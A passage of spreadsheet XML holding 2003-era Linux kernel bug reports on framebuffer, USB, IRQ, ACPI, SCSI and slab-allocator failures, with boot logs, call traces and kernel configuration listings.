  </si>
  <si>
    <t>2003-11-23 13:19 UTC</t>
  </si>
  <si>
    <t>Guillaume Duc</t>
  </si>
  <si>
    <t>2005-08-15 17:40 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.0 Hardware Environment: IBM ThinkPad i1200 (PentiumIII 700, 192 Mo RAM) Video card: Silicon Motion Lynx EM+ (4 Mo) Software Environment: Problem Description: When I boot with the framebuffer, I see only the upper left hand corner of the screen. So I see only the Linux's logo and 1/4 of the kernel's messages. I was working properly with 2.4.22. I use vesafb. dmesg with 2.6.0-test9: vesafb: framebuffer at 0xe000000, mapped to 0xcc809000, size 4096k vesafb: mode is 1024x768x8, linelength=1024, pages=4 vesafb: protected mode interface info at c9b0:0004 vesafb: scrolling: redraw fb0: VESA VGA frame buffer device vga16fb: initializing vga16fb: mapped to 0xc00a0000 fb1: VGA16 VGA frame buffer device [...] Console: switching to colour frame buffer device 128x48 dmesg with 2.4.22: vesafb: framebuffer at 0xe000000, mapped to 0xcc818000, size 1536k vesafb: mode is 1024x768x8, linelength=1024, pages=4 vesafb: protected mode interface info at c9b0:0004 vesafb: scrolling: redraw Console: switching to colour frame buffer device 128x48 /etc/lilo.conf: vga = 773 (but I have tried other vga mode but no one can display the whole screen) Steps to reproduce: - Compile 2.6.0-test9 with vesafb - Add vga = 773 to lilo.conf - Reboot with the new kernel</t>
  </si>
  <si>
    <t>usb host doesn't wake up after apm suspends</t>
  </si>
  <si>
    <t>2003-11-23 16:09 UTC</t>
  </si>
  <si>
    <t>Darren Chuck</t>
  </si>
  <si>
    <t>2004-04-05 20:18 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Hardware Environment:sony vaio z505hs Software Environment:gcc3.3.2, glibc 2.3.2 Problem Description: dmesg at booting up: PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) PCI: Address space collision on region 7 of bridge 0000:00:07.3 [8000:803f] PCI: Address space collision on region 8 of bridge 0000:00:07.3 [1040:105f] PCI: Using IRQ router PIIX/ICH [8086/7110] at 0000:00:07.0 PCI: Found IRQ 9 for device 0000:00:0c.0 PCI: Sharing IRQ 9 with 0000:00:0a.0 PCI: Sharing IRQ 9 with 0000:00:0d.0 after waking up drivers/usb/host/uhci-hcd.c: fca0: host system error, PCI problems? drivers/usb/host/uhci-hcd.c: fca0: host controller halted. very bad Steps to reproduce: apm -s, then wake the machine up</t>
  </si>
  <si>
    <t>IRQ15 interrupt storm unless pci=noacpi or IOAPIC -- VIA KT600 PIC-mode</t>
  </si>
  <si>
    <t>2003-11-23 16:51 UTC</t>
  </si>
  <si>
    <t>Marco d'Itri</t>
  </si>
  <si>
    <t>2004-04-12 22:29 UTC</t>
  </si>
  <si>
    <t>This is an ASUS A7V600 motherboard, and the second IDE channel does not work at all. This is fixed by starting the kernel with pci=noacpi. I reported to LKML that this problem was not present in 2.4 kernels but I probably was wrong, as I think ACPI was not enabled. LKML thread: http://groups.google.com/groups?threadm=V8yW.7eW.3%40gated-at.bofh.it At boot time: kernel: ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 10 kernel: ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 11 kernel: ACPI: PCI Interrupt Link [LNKE] enabled at IRQ 3 kernel: ACPI: PCI Interrupt Link [LNKF] enabled at IRQ 7 kernel: ACPI: PCI Interrupt Link [LNKG] enabled at IRQ 5 kernel: ACPI: PCI Interrupt Link [LNKH] enabled at IRQ 15 kernel: PCI: Using ACPI for IRQ routing [...] kernel: Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 kernel: ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx kernel: VIA8237SATA: IDE controller at PCI slot 0000:00:0f.0 kernel: VIA8237SATA: chipset revision 128 kernel: VIA8237SATA: 100%% native mode on irq 3 kernel: ide2: BM-DMA at 0xa000-0xa007, BIOS settings: hde:pio, hdf:pio kernel: ide3: BM-DMA at 0xa008-0xa00f, BIOS settings: hdg:pio, hdh:pio kernel: VP_IDE: IDE controller at PCI slot 0000:00:0f.1 kernel: VP_IDE: chipset revision 6 kernel: VP_IDE: not 100%% native mode: will probe irqs later kernel: ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx kernel: VP_IDE: VIA vt8237 (rev 00) IDE UDMA133 controller on pci0000:00:0f.1 kernel: ide0: BM-DMA at 0x9400-0x9407, BIOS settings: hda:DMA, hdb:DMA kernel: ide1: BM-DMA at 0x9408-0x940f, BIOS settings: hdc:DMA, hdd:DMA kernel: ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 kernel: hdc: IRQ probe failed (0x3cfa) kernel: hdc: CD-ROM 50X, ATAPI CD/DVD-ROM drive kernel: hdd: 32X10, ATAPI CD/DVD-ROM drive kernel: irq 15: nobody cared! kernel: Call Trace: kernel: [&lt;c010a92b&gt;] __report_bad_irq+0x2b/0x90 kernel: [&lt;c010aa24&gt;] note_interrupt+0x64/0xa0 kernel: [&lt;c010ac2a&gt;] do_IRQ+0xea/0xf0 kernel: [&lt;c01092a0&gt;] common_interrupt+0x18/0x20 kernel: [&lt;c011d0c4&gt;] do_softirq+0x44/0xa0 kernel: [&lt;c010ac11&gt;] do_IRQ+0xd1/0xf0 kernel: [&lt;c01092a0&gt;] common_interrupt+0x18/0x20 kernel: [&lt;c010aff4&gt;] setup_irq+0x64/0xb0 kernel: [&lt;c021a730&gt;] ide_intr+0x0/0x130 kernel: [&lt;c010acaf&gt;] request_irq+0x7f/0xc0 kernel: [&lt;c021bc86&gt;] init_irq+0x156/0x400 kernel: [&lt;c021a730&gt;] ide_intr+0x0/0x130 kernel: [&lt;c021c318&gt;] hwif_init+0xb8/0x250 kernel: [&lt;c021b94c&gt;] probe_hwif_init+0x2c/0x80 kernel: [&lt;c022761a&gt;] ide_setup_pci_device+0x7a/0x80 kernel: [&lt;c021902d&gt;] via_init_one+0x3d/0x50 kernel: [&lt;c039791d&gt;] ide_scan_pcidev+0x5d/0x70 kernel: [&lt;c0397976&gt;] ide_scan_pcibus+0x46/0xd0 kernel: [&lt;c0397823&gt;] probe_for_hwifs+0x13/0x20 kernel: [&lt;c0397838&gt;] ide_init_builtin_drivers+0x8/0x20 kernel: [&lt;c0397898&gt;] ide_init+0x48/0x70 kernel: [&lt;c038674b&gt;] do_initcalls+0x2b/0xa0 kernel: [&lt;c01278b2&gt;] init_workqueues+0x12/0x60 kernel: [&lt;c0105097&gt;] init+0x27/0x110 kernel: [&lt;c0105070&gt;] init+0x0/0x110 kernel: [&lt;c01072a9&gt;] kernel_thread_helper+0x5/0xc kernel: kernel: handlers: kernel: [&lt;c021a730&gt;] (ide_intr+0x0/0x130) kernel: Disabling IRQ #15 kernel: ide1 at 0x170-0x177,0x376 on irq 15 And trying to mount a cdrom fails: kernel: hdc: lost interrupt kernel: hdc: lost interrupt kernel: irq 15: nobody cared! kernel: Call Trace: kernel: [&lt;c010a92b&gt;] __report_bad_irq+0x2b/0x90 kernel: [&lt;c010aa24&gt;] note_interrupt+0x64/0xa0 kernel: [&lt;c010ac2a&gt;] do_IRQ+0xea/0xf0 kernel: [&lt;c01092a0&gt;] common_interrupt+0x18/0x20 kernel: [&lt;c021a5af&gt;] ide_timer_expiry+0xdf/0x1b0 kernel: [&lt;c021a4d0&gt;] ide_timer_expiry+0x0/0x1b0 kernel: [&lt;c0120e90&gt;] run_timer_softirq+0xb0/0x170 kernel: [&lt;c011d116&gt;] do_softirq+0x96/0xa0 kernel: [&lt;c010ac11&gt;] do_IRQ+0xd1/0xf0 kernel: [&lt;c0105000&gt;] rest_init+0x0/0x30 kernel: [&lt;c01092a0&gt;] common_interrupt+0x18/0x20 kernel: [&lt;c0105000&gt;] rest_init+0x0/0x30 kernel: [&lt;c0107066&gt;] default_idle+0x26/0x30 kernel: [&lt;c01070e4&gt;] cpu_idle+0x34/0x40 kernel: [&lt;c03866f0&gt;] start_kernel+0x140/0x150 kernel: [&lt;c0386480&gt;] unknown_bootoption+0x0/0x100 kernel: kernel: handlers: kernel: [&lt;c021a730&gt;] (ide_intr+0x0/0x130) kernel: Disabling IRQ #15 kernel: hdc: ATAPI 50X CD-ROM drive, 128kB Cache, UDMA(33) kernel: Uniform CD-ROM driver Revision: 3.12 kernel: hdc: lost interrupt last message repeated 2 times kernel: irq 15: nobody cared! kernel: Call Trace: kernel: [&lt;c010a92b&gt;] __report_bad_irq+0x2b/0x90 kernel: [&lt;c010aa24&gt;] note_interrupt+0x64/0xa0 kernel: [&lt;c010ac2a&gt;] do_IRQ+0xea/0xf0 kernel: [&lt;c01092a0&gt;] common_interrupt+0x18/0x20 kernel: [&lt;c010a8b0&gt;] handle_IRQ_event+0x20/0x70 kernel: [&lt;c010abbc&gt;] do_IRQ+0x7c/0xf0 kernel: [&lt;c01092a0&gt;] common_interrupt+0x18/0x20 kernel: [&lt;c021a5af&gt;] ide_timer_expiry+0xdf/0x1b0 kernel: [&lt;c021a4d0&gt;] ide_timer_expiry+0x0/0x1b0 kernel: [&lt;c0120e90&gt;] run_timer_softirq+0xb0/0x170 kernel: [&lt;c011d116&gt;] do_softirq+0x96/0xa0 kernel: [&lt;c010ac11&gt;] do_IRQ+0xd1/0xf0 kernel: [&lt;c0105000&gt;] rest_init+0x0/0x30 kernel: [&lt;c01092a0&gt;] common_interrupt+0x18/0x20 kernel: [&lt;c0105000&gt;] rest_init+0x0/0x30 kernel: [&lt;c0107066&gt;] default_idle+0x26/0x30 kernel: [&lt;c01070e4&gt;] cpu_idle+0x34/0x40 kernel: [&lt;c03866f0&gt;] start_kernel+0x140/0x150 kernel: [&lt;c0386480&gt;] unknown_bootoption+0x0/0x100 kernel: kernel: handlers: kernel: [&lt;c021a730&gt;] (ide_intr+0x0/0x130) kernel: Disabling IRQ #15 [...] CPU0 0: 3167529 XT-PIC timer 1: 8602 XT-PIC i8042 2: 0 XT-PIC cascade 3: 0 XT-PIC uhci_hcd, uhci_hcd 5: 0 XT-PIC ehci_hcd, VIA8233 7: 1 XT-PIC uhci_hcd, uhci_hcd 8: 5 XT-PIC rtc 9: 0 XT-PIC acpi 10: 12024 XT-PIC SysKonnect SK-98xx 11: 0 XT-PIC saa7134[0] 12: 50940 XT-PIC i8042 14: 31247 XT-PIC ide0 15: 1000005 XT-PIC ide1 NMI: 0 ERR: 0 00:00.0 Host bridge: VIA Technologies, Inc. VT8377 [KT400 AGP] Host Bridge (rev 80) 00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI Bridge 00:09.0 Ethernet controller: 3Com Corporation 3c940 1000Base? (rev 12) 00:0a.0 Multimedia controller: Philips Semiconductors SAA7134 (rev 01) 00:0f.0 RAID bus controller: VIA Technologies, Inc.: Unknown device 3149 (rev 80) 00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT8233/A/C/VT8235 PIPC Bus Master IDE (rev 06) 00:10.0 USB Controller: VIA Technologies, Inc. USB (rev 81) 00:10.1 USB Controller: VIA Technologies, Inc. USB (rev 81) 00:10.2 USB Controller: VIA Technologies, Inc. USB (rev 81) 00:10.3 USB Controller: VIA Technologies, Inc. USB (rev 81) 00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86) 00:10.5 Network controller: VIA Technologies, Inc.: Unknown device d104 00:11.0 ISA bridge: VIA Technologies, Inc.: Unknown device 3227 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235 AC97 Audio Controller (rev 60) 01:00.0 VGA compatible controller: ATI Technologies Inc: Unknown device 5964 (rev 01) 01:00.1 Display controller: ATI Technologies Inc: Unknown device 5d44 (rev 01) ----------VIA BusMastering IDE Configuration---------------- Driver Version: 3.38 South Bridge: VIA vt8237 Revision: ISA 0x0 IDE 0x6 Highest DMA rate: UDMA133 BM-DMA base: 0x9400 PCI clock: 33.3MHz Master Read Cycle IRDY: 0ws Master Write Cycle IRDY: 0ws BM IDE Status Register Read Retry: yes Max DRDY Pulse Width: No limit -----------------------Primary IDE-------Secondary IDE------ Read DMA FIFO flush: yes yes End Sector FIFO flush: no no Prefetch Buffer: yes no Post Write Buffer: yes no Enabled: yes yes Simplex only: no no Cable Type: 80w 80w -------------------drive0----drive1----drive2----drive3----- Transfer Mode: UDMA UDMA UDMA DMA Address Setup: 120ns 120ns 120ns 120ns Cmd Active: 90ns 90ns 90ns 90ns Cmd Recovery: 30ns 30ns 30ns 30ns Data Active: 90ns 90ns 90ns 90ns Data Recovery: 30ns 30ns 30ns 30ns Cycle Time: 15ns 15ns 60ns 120ns Transfer Rate: 133.3MB/s 133.3MB/s 33.3MB/s 16.6MB/s</t>
  </si>
  <si>
    <t>disabled PCI Interrupt Link devices.</t>
  </si>
  <si>
    <t>2003-11-24 01:15 UTC</t>
  </si>
  <si>
    <t>2004-05-11 23:20 UTC</t>
  </si>
  <si>
    <t>Current implementation just add disabled link device to acpi_link list. And this link device could break acpi_pci_link_allocate, because it assume every link device is valid one.</t>
  </si>
  <si>
    <t>oops during boot on 4/4 kernel</t>
  </si>
  <si>
    <t>2003-11-24 08:13 UTC</t>
  </si>
  <si>
    <t>2004-01-26 09:55 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: x440 8-way Software Environment: 2.6.0-test9-mm4 Problem Description: enable 4/4 VM split, oops on boot. I will attach a boot log. Martin, I have a system available if anyone wants to test stuff</t>
  </si>
  <si>
    <t>Oops during boot aic7xxx</t>
  </si>
  <si>
    <t>2.6.0-test10</t>
  </si>
  <si>
    <t>2003-11-24 13:57 UTC</t>
  </si>
  <si>
    <t>2003-12-15 13:01 UTC</t>
  </si>
  <si>
    <t>Distribution: slackware 8.0 Hardware Environment: shuttle ak32e, adaptec 29160 Software Environment: glibc 2.3.1, gcc-3.3.2 Problem Description: oops during boot scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.35 &lt;Adaptec 29160 Ultra160 SCSI adapter&gt; aic7892: Ultra160 Wide Channel A, SCSI Id=7, 32/253 SCBs (scsi0:A:0): 40.000MB/s transfers (20.000MHz, offset 63, 16bit) Badness in kobject_get at lib/kobject.c:439 Call Trace: [&lt;c01c0c6a&gt;] kobject_get+0x4a/0x50 [&lt;c0201cfa&gt;] get_device+0x1a/0x30 [&lt;c023a08c&gt;] scsi_device_get+0x2c/0xa0 [&lt;c023a1ae&gt;] __scsi_iterate_devices+0x3e/0x90 [&lt;c023dbab&gt;] scsi_run_host_queues+0x1b/0x50 [&lt;c025ed54&gt;] ahc_linux_release_simq+0x94/0xe0 [&lt;c0259f9a&gt;] ahc_linux_dv_thread+0x25a/0x320 [&lt;c0259d40&gt;] ahc_linux_dv_thread+0x0/0x320 [&lt;c0107329&gt;] kernel_thread_helper+0x5/0xc Vendor: QUANTUM Model: ATLAS_V_18_WLS Rev: 0230 Type: Direct-Access ANSI SCSI revision: 03 scsi0:A:0:0: Tagged Queuing enabled. Depth 32 SCSI device sda: 35861388 512-byte hdwr sectors (18361 MB) SCSI device sda: drive cache: write back sda: sda1 sda2 &lt; sda5 sda6 sda7 sda8 &gt; Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 Attached scsi generic sg0 at scsi0, channel 0, id 0, lun 0, type 0 Steps to reproduce: boot system with aic7xxx</t>
  </si>
  <si>
    <t>S5 transition hangs for IBM R40</t>
  </si>
  <si>
    <t>2003-11-24 16:17 UTC</t>
  </si>
  <si>
    <t>2004-03-04 12:46 UTC</t>
  </si>
  <si>
    <t>Distribution: all Hardware Environment: IBM Thinkpad R40 Software Environment: ACPI-CA Problem Description: Transitioning to the S5 state hangs on these systems. It turns out that the code in hwsleep.c does not distinguish between G1 and G2 states in how it prepares to sleep. The attached patch fixes the S5 transition by making AcpiEnterSleepState behave more like section 9.1.7 of the ACPI spec. In particular, Don tracked the problem to the call to BM disable. Submitted by: Don Lewis &lt;truckman@freebsd.org&gt; See also: bug 1038</t>
  </si>
  <si>
    <t>Should use IRQ resource type found in handling possible IRQ list</t>
  </si>
  <si>
    <t>2003-11-25 03:26 UTC</t>
  </si>
  <si>
    <t>2004-04-12 22:30 UTC</t>
  </si>
  <si>
    <t>Distribution: RH Hardware Environment: ALL Software Environment: 2.6.0-test10 Problem Description: We should use IRQ resource type found in handling possible IRQ list, rather than just guess like below code: if(irq &lt;= 15) resource_type = ACPI_RSTYPE_IRQ else resource_type = ACPI_RSTYPE_EXT_IRQ</t>
  </si>
  <si>
    <t>umount from disconnected USB causes kernel oops</t>
  </si>
  <si>
    <t>2003-11-25 07:24 UTC</t>
  </si>
  <si>
    <t>2004-06-19 17:35 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable (current) Hardware Environment: x86 UMP, K7 Software Environment: bash, mount, usb-storage Problem Description: umount from disconnected USB causes kernel oops Steps to reproduce: Insert USB camera, let it time out (10 min of no activity) so it disconnects from bus. If it was mounted somewhere and it disconnects, umount gives a kernel oops. smartass:/home/lsa# mount /dev/ide/host0/bus0/target0/lun0/part5 on / type ext2 (rw,errors=remount-ro) proc on /proc type proc (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/ide/host0/bus0/target0/lun0/part1 on /boot type ext3 (rw) /dev/ide/host0/bus0/target0/lun0/part6 on /var type ext3 (rw) /dev/ide/host0/bus0/target0/lun0/part3 on /var/log type ext3 (rw) /dev/ide/host0/bus0/target0/lun0/part7 on /home type ext3 (rw) /dev/ide/host0/bus0/target0/lun0/part8 on /data type ext3 (rw) /dev/ide/host0/bus0/target1/lun0/part1 on /video type ext3 (rw,nosuid,nodev) usbfs on /proc/bus/usb type usbfs (rw) none on /sys type sysfs (rw) /dev/scsi/host3/bus0/target0/lun0/part1 on /dimagex type vfat (rw) smartass:/home/lsa# umount /dimagex/ Speicherzugriffsfehler smartass:/home/lsa# umount /dimagex umount: /dev/scsi/host3/bus0/target0/lun0/part1: Nicht gefunden umount: /dimagex ist nicht eingeh</t>
  </si>
  <si>
    <t>Add _SST support, enabling suspend/resume LEDs</t>
  </si>
  <si>
    <t>2003-11-25 09:40 UTC</t>
  </si>
  <si>
    <t>2004-03-04 12:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: ACPI-CA Problem Description: This is a feature request. The attached patch calls the \_SI._SST method with the proper argument on both the suspend and resume path. This makes the LEDs on my Thinkpad report the sleeping state correctly. Errors are ignored since many systems don't have this method.</t>
  </si>
  <si>
    <t>kernel BUG at mm/slab.c:1708!</t>
  </si>
  <si>
    <t>kernel-2.6.0-test9-mm5</t>
  </si>
  <si>
    <t>2003-11-25 14:27 UTC</t>
  </si>
  <si>
    <t>shal</t>
  </si>
  <si>
    <t>2003-12-03 11:53 UTC</t>
  </si>
  <si>
    <t>Distribution: slackware-current Hardware Environment: Athlon XP1600+ via KT333 mother card Software Environment: grep -v "not set" .config | grep CONFIG : CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_BROKEN_ON_SMP=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_KMOD=y CONFIG_X86_PC=y CONFIG_MK7=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y CONFIG_NOHIGHMEM=y CONFIG_MTRR=y CONFIG_PM=y CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y CONFIG_ACPI_BUS=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y CONFIG_PCI=y CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y CONFIG_HOTPLUG=y CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y CONFIG_PNP=y CONFIG_BLK_DEV_FD=y CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_CRYPTOLOOP=m CONFIG_BLK_DEV_NBD=m CONFIG_LBD=y CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECD=y CONFIG_IDE_TASKFILE_IO=y CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y CONFIG_IDEDMA_PCI_AUTO=y CONFIG_BLK_DEV_ADMA=y CONFIG_BLK_DEV_PIIX=y CONFIG_BLK_DEV_VIA82CXXX=m CONFIG_BLK_DEV_IDEDMA=y CONFIG_IDEDMA_AUTO=y CONFIG_SCSI=y CONFIG_SCSI_PROC_FS=y CONFIG_BLK_DEV_SD=m CONFIG_MAX_SD_DISKS=256 CONFIG_BLK_DEV_SR=m CONFIG_CHR_DEV_SG=m CONFIG_SCSI_SYM53C8XX_2=m CONFIG_SCSI_SYM53C8XX_DMA_ADDRESSING_MODE=1 CONFIG_SCSI_SYM53C8XX_DEFAULT_TAGS=16 CONFIG_SCSI_SYM53C8XX_MAX_TAGS=64 CONFIG_NET=y CONFIG_PACKET=y CONFIG_UNIX=y CONFIG_NET_KEY=m CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_NET_IPIP=m CONFIG_NET_IPGRE=m CONFIG_INET_AH=m CONFIG_INET_ESP=m CONFIG_INET_IPCOMP=m CONFIG_XFRM=y CONFIG_XFRM_USER=m CONFIG_IPV6_SCTP__=y CONFIG_NETDEVICES=y CONFIG_DUMMY=m CONFIG_TUN=m CONFIG_NET_ETHERNET=y CONFIG_MII=m CONFIG_NET_PCI=y CONFIG_8139TOO=m CONFIG_PHONE=m CONFIG_PHONE_IXJ=m CONFIG_INPUT=y CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_NR_UARTS=4 CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_I2C=m CONFIG_I2C_CHARDEV=m CONFIG_I2C_ALGOBIT=m CONFIG_RTC=m CONFIG_DRM=y CONFIG_DRM_TDFX=m CONFIG_VIDEO_DEV=m CONFIG_VIDEO_BT848=m CONFIG_VIDEO_TUNER=m CONFIG_VIDEO_BUF=m CONFIG_VIDEO_BTCX=m CONFIG_FB=y CONFIG_FB_3DFX=m CONFIG_VGA_CONSOLE=y CONFIG_DUMMY_CONSOLE=y CONFIG_SOUND=y CONFIG_SND=y CONFIG_SND_SEQUENCER=y CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_ENS1371=m CONFIG_SND_USB_AUDIO=m CONFIG_USB=y CONFIG_USB_DEVICEFS=y CONFIG_USB_EHCI_HCD=y CONFIG_USB_UHCI_HCD=y CONFIG_USB_AUDIO=m CONFIG_USB_STORAGE=y CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y CONFIG_USB_PWC=m CONFIG_EXT2_FS=y CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_JBD=y CONFIG_FS_MBCACHE=y CONFIG_AUTOFS4_FS=y CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_UDF_FS=y CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_DEVPTS_FS=y CONFIG_TMPFS=y CONFIG_RAMFS=y CONFIG_MSDOS_PARTITION=y CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y CONFIG_NLS_CODEPAGE_852=y CONFIG_NLS_ISO8859_1=y CONFIG_NLS_ISO8859_15=y CONFIG_NLS_UTF8=y CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y CONFIG_DEBUG_IOVIRT=y CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_SPINLOCK=y CONFIG_DEBUG_PAGEALLOC=y CONFIG_SPINLINE=y CONFIG_DEBUG_INFO=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y CONFIG_CRYPTO_NULL=m CONFIG_CRYPTO_MD4=m CONFIG_CRYPTO_MD5=m CONFIG_CRYPTO_SHA1=m CONFIG_CRYPTO_DES=m CONFIG_CRYPTO_AES=m CONFIG_CRYPTO_DEFLATE=m CONFIG_CRC32=m CONFIG_ZLIB_INFLATE=m CONFIG_ZLIB_DEFLATE=m CONFIG_X86_BIOS_REBOOT=y CONFIG_PC=y For information,a external module is added : the eagle usb modem module. Problem Description: a Oops is produced, the process is passed on the DW state: Nov 23 20:00:07 shal kernel: slab error in cache_free_debugcheck(): cache `size-2048': double free, or memory outs ide object was overwritten Nov 23 20:00:07 shal kernel: Call Trace: Nov 23 20:00:07 shal kernel: [&lt;c0153084&gt;] kfree+0x2e4/0x410 Nov 23 20:00:07 shal kernel: [&lt;c0312f04&gt;] kfree_skbmem+0x14/0x30 Nov 23 20:00:07 shal kernel: [&lt;c0312f04&gt;] kfree_skbmem+0x14/0x30 Nov 23 20:00:07 shal kernel: [&lt;c0312f86&gt;] __kfree_skb+0x66/0xd0 Nov 23 20:00:07 shal kernel: [&lt;c033b4d8&gt;] tcp_recvmsg+0xb18/0xe10 Nov 23 20:00:07 shal kernel: [&lt;c035f574&gt;] inet_recvmsg+0x54/0x70 Nov 23 20:00:07 shal kernel: [&lt;c030ecf4&gt;] sock_aio_read+0xc4/0xe0 Nov 23 20:00:07 shal kernel: [&lt;c0170212&gt;] do_sync_read+0xc2/0x100 Nov 23 20:00:07 shal kernel: [&lt;c014c5d2&gt;] __get_free_pages+0x22/0x50 Nov 23 20:00:07 shal kernel: [&lt;c0122c20&gt;] autoremove_wake_function+0x0/0x50 Nov 23 20:00:07 shal kernel: [&lt;c0188d1a&gt;] poll_freewait+0x3a/0x50 Nov 23 20:00:07 shal kernel: [&lt;c0170331&gt;] vfs_read+0xe1/0x120 Nov 23 20:00:07 shal kernel: [&lt;c01705cf&gt;] sys_read+0x3f/0x60 Nov 23 20:00:07 shal kernel: [&lt;c03793ff&gt;] syscall_call+0x7/0xb Nov 23 20:00:07 shal kernel: Nov 23 20:00:07 shal kernel: c19c301e: redzone 1: 0x5a5a5a5a, redzone 2: 0xe09e0002. Nov 23 20:00:07 shal kernel: ------------[ cut here ]------------ Nov 23 20:00:07 shal kernel: kernel BUG at mm/slab.c:1708! Nov 23 20:00:07 shal kernel: invalid operand: 0000 [#1] Nov 23 20:00:07 shal kernel: DEBUG_PAGEALLOC Nov 23 20:00:07 shal kernel: CPU: 0 Nov 23 20:00:07 shal kernel: EIP: 0060:[&lt;c015301b&gt;] Not tainted VLI Nov 23 20:00:07 shal kernel: EFLAGS: 00010006 Nov 23 20:00:07 shal kernel: EIP is at kfree+0x27b/0x410 Nov 23 20:00:07 shal kernel: eax: c19c3000 ebx: 80010c00 ecx: 00001000 edx: 0000001e Nov 23 20:00:07 shal kernel: esi: cffefb00 edi: c19c3000 ebp: c3f99d84 esp: c3f99d54 Nov 23 20:00:07 shal kernel: ds: 007b es: 007b ss: 0068 Nov 23 20:00:07 shal kernel: Process mlnet (pid: 777, threadinfo=c3f98000 task=cc07b950) Nov 23 20:00:07 shal kernel: Stack: cffefb00 c19c301e 5a5a5a5a e09e0002 019c301e c0312f04 c19c301e cffe8f78 Nov 23 20:00:07 shal kernel: 00000282 cbfd3f60 00000000 558f8d7b c3f99d98 c0312f04 c19c3816 00000000 Nov 23 20:00:07 shal kernel: c91e6f00 c3f99db0 c0312f86 cbfd3f60 cbfd3f60 00000000 cbfd3f60 c3f99e14 Nov 23 20:00:07 shal kernel: Call Trace: Nov 23 20:00:07 shal kernel: [&lt;c0312f04&gt;] kfree_skbmem+0x14/0x30 Nov 23 20:00:07 shal kernel: 